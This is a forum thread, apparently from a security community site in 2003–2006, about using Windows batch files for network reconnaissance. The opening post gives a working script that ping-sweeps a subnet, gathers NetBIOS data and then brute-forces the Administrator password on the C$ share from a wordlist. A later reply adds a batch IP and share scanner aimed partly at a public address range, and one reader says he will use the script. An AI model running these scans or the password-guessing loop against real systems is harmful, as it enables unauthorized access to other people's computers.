Hacking with DOS?

Printable View

January 1st, 2003, 09:26 PM
Tedob1

Hacking with DOS?

Many are quick to say windows is lame. well it might not be as stable and might not come with all the third party software *nix has but an operating system is only as lame as its operator.now i can think of a dozen boring examples but nobody would pay any attention so i made a up a simple scenerio that might get some to really try to learn their OS.

(lame though it may be it's just to illiustrates a point)

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

What i dont have a scanner on this computer im on and can't download EXEs...no prob! this is an NT based box and i know my ****:

sending.bat
------------------------------------------

REM all the text for each "for" statement
REM must be on one line

for /L %%x IN (1,1,255) DO ping -n 1 10.0.0.%%x | find /I "reply" >>pg.txt

for /F "tokens=1 delims=:" %%x in (pg.txt) DO echo %%x >>pg2.txt

for /f "tokens=3" %%x IN (pg2.txt) DO nbtstat -A %%x |more >>pg3.txt

-------------------------------------------
You could enter it one line at a time at the command prompt without makeing a batchfile, but thats not nearly as much fun

in the first "for" statement, (1,1,255) says: make %%x egual 1 incremanting by 1 each loop until it reaches 255. In a batch file '%' by itself will be removed so it must be used twice: "%%"

ping returns:

Reply from 10.0.0.1: bytes=32 time=150ms TTL=59

by changing the default delimiter to a colon, splitting the line into 2 tokens in pg2.txt and printing only the first and removing the colon because it is the delimiter ( tokens=1 delims=:) leaving only:

Reply from 10.0.0.1

in the third "for" statement we used the default or "space" delimiter making the IP addy the

third token (token=3) and using nbtstat -A we record the results to pg3.txt

now its time for to get yourself a drink and go to the bathroom before you get into the long haul:

for /f "tokens=1" %%x in (wordlist.txt) do NET USE \\10.0.0.1\c$ /user: Administrator %%x

This is all done with out using some stupid poorly made program that may contain a trojan.

your on your own from here, im not trying to teach you to break into a computer there's enough written in tutorials to show you that, but rather show you what you can do if you know you OS. just remember if you try this on the net you could get screwed. There is nothing stealth about this.

Have a happy new year and resolve to really learn what you have. Dont wait for that special book or turtorial to come along....just do it
January 2nd, 2003, 01:02 AM
Tedob1

I guess this needs to be pointed out more clearly.

This will not work on 9x machines

For those who do not know their basics, "for" is an internal command. that is to say it is contained in commnad.com and cmd.exe.

the for command on 9x machines will not loop threw the contents of files or incremant variables. only the for command of NT or better machines will do this.
January 2nd, 2003, 01:40 AM
t2k2

You bring up a very good point here Ted. I mean, why not learn the OS if you are going to be working with it? As for the "hack", I personally don't have much experience with batch files or programming for that matter, but I do understand the implications. For the most part, I can look at files like this and figure out what they mean, so your post has proven quite helpful (That's the point, I know.) I have not had much choice in learning Windows, but I am trying to learn as much as I can of Linux. My efforts have proven invaluable since I have been assigned projects involving the OS at work.

Next time make up your mind where you want to post it; you moved it on me earlier, and I had to retype it from memory! j/k Keep up the good work Ted.

Cheers.
June 15th, 2003, 11:14 AM
CraZy_AhmaD

hmmm nice one a netbios batch file scanning
gonna use this one for sure

but it scans only for administrator account or am i wrong?
July 20th, 2003, 06:52 AM
x acidreign x

you said this would work on "NT or better" but I tried it on BSD and it didn't work :-(
(joking)

Good tutorial, I enjoyed reading it.
July 20th, 2003, 07:01 AM
blue_wolf

Ok someone needs to PM me im confused..srry
July 20th, 2003, 09:57 PM
Scatman420

Fantastic Post...The only problem posed is that like someone before me said, it only scans from the "admin". So one might be confronted with not only finding the pass but a valid user name as well.

Scat
July 24th, 2003, 05:02 AM
Tedob1

i just used that as an example of what you could do as food for thought. you could use the same principle to scan for null connections or whatever just put the commands with args after the DO, but as was stated eariler you could get busted.

on the non-hacking side, i have a bunch of remote locations with winVNC listening on DSL connections. each location sends a file with its location code as its name to an ftp server. Using the FOR command i loop threw the log twice. the first pass gets piped threw 'find' and creates a file containg only lines with the matchng location code. the second time i loop threw making %%X equal the IP Address. the next line starts VNC %%X which is the last or latest address in the log file. now all i have to do is enter the password.
March 21st, 2005, 11:51 PM
dickfitzwell

very smart to point out that you must know your OS if you want to hack anything, even simple batch files with DOS.
March 22nd, 2005, 04:17 AM
scratchONtheBOX

WELCOME TO AO

Hi dickfitzwell,

WELCOME TO AO!

I believed that hacking interests you, as well as it interest us here in AO, especially on being aware of it, and avoiding such things in the near future.

You could visit the AO FAQ for more introduction about AO.

For start-up, same like any organization that you are willing to join, AO has rules, traditions, and a community willing to help and share their knowledge and opinions. The FAQ could be a short walk-through for you to get involved in the community.

Enjoy your stay!

Yo!
March 22nd, 2005, 08:11 PM
beee

yup....agree with you....

u just told the kids something new

i immagine the copy and paste.... wish there was a counter for that loool
March 22nd, 2005, 10:41 PM
Egaladeist

beee, please read scratchINtheBOX's previous post ( that's the one right before yours on page one )

Thanks,

Eg
March 22nd, 2005, 10:51 PM
The Duck

Ok, obviously some people don't get what scratchinthebox was trying to say, so I'll translate it:

Don't post in 2 year old threads!!!
March 23rd, 2005, 07:42 AM
white_pawn

i'll make the post of Theduck even more clear

Don't post in 2 year old threads!!! <--------------------
Don't post in 2 year old threads without any wothwile answers or suggestions!!!:-D
March 23rd, 2005, 10:01 AM
scratchONtheBOX

READ THE FAQ

beee,

Now, I can see more reasons why the AO guys are pissed off and will probably NEG you some if you don't get yourself more AWARE of the FAQ.

Yo!
January 19th, 2006, 04:20 PM
agus

thank you for all your sugestions
January 20th, 2006, 10:33 AM
axxez

I wrote an IP-Scanner in Batch, too. Look at this (long version/short version):

================================================================@ echo off

if %1 == --help goto hlp

set a=0
set aa=0
set b=%2
set c=-n
set d=-f

del alive.txt
del shared.txt

:loop
cls
set a=%1
set /a b = b + 1

if %b% == %3 goto end

echo testing %a%%b%
ping -n 1 -i 1 -l 1 -w 1 %a%%b% |find /i "Empfangen = 1" || goto endofloop
rem ===:::>>> der errorlevel beim ping gibt nicht immer 0 für erfolgreich aus, gelöst mit "||" (nachfolgendes bei fehlschlag des vorherigen ausführen)

echo ==========================>>alive.txt
echo %a%%b%>>alive.txt
if %c% == %4 goto netname
if %c% == %5 goto netname

rem ===:::>>> durch die obige Funktion kann man die Parameter -n und -f in beliebiger Reihenfolge zueinander angeben

goto 1

:netname

nslookup %a%%b% |find "Name:">>alive.txt

:1

if %d% == %4 goto share
if %d% == %5 goto share
goto endofloop

:share

echo ==========================>>shared.txt
echo %a%%b%>>shared.txt
net view %a%%b%>>shared.txt

:endofloop
cls

goto loop

:hlp

echo .
echo ===== Hilfe =====
echo Parameter1: IP bis zur 3. Stelle, inkl. Punkt
echo Parameter2: 4. Stelle der IP bei der der Scan starten soll
echo Parameter3: 4. Stelle der IP bei der der Scan enden soll
echo Parameter4: -n ; Namensaufloesung (auch von offline Rechnern da nslookup!)
echo Parameter5: -f ; zeigt die Netzwerkfreigaben (experimentel)
echo .
echo Beispiele:
echo ipscan 192.168.1. 0 66
echo Das Netz 192.168.1.1-66 wird gescant.
echo ipscan 192.168.1. 6 9 -n
echo Das Netz 192.168.1.6-9 wird gescant + NetBIOS-Names werden ausgelesen
goto end2

:end
cls
type alive.txt

:end2

=========================================================
=========================================================
@echo off

echo IP-Scan>ipscanlog
echo Starttime:>>ipscanlog
time /t>>ipscanlog
set a=81.201.41.
set b=1

:loop
set /a b=b+1
if %b%==25 goto end
ping %a%%b% -n 1 -l 10 -w 1|find "Empfangen = 1"
if errorlevel 1 echo %a%%b% is dead>>ipscanlog
if not errorlevel 1 echo %a%%b% is alive>>ipscanlog
REM cls
goto loop

:end
find "alive" ipscanlog
echo Starttime:>>ipscanlog
time /t>>ipscanlog
find ":" ipscanlog
echo.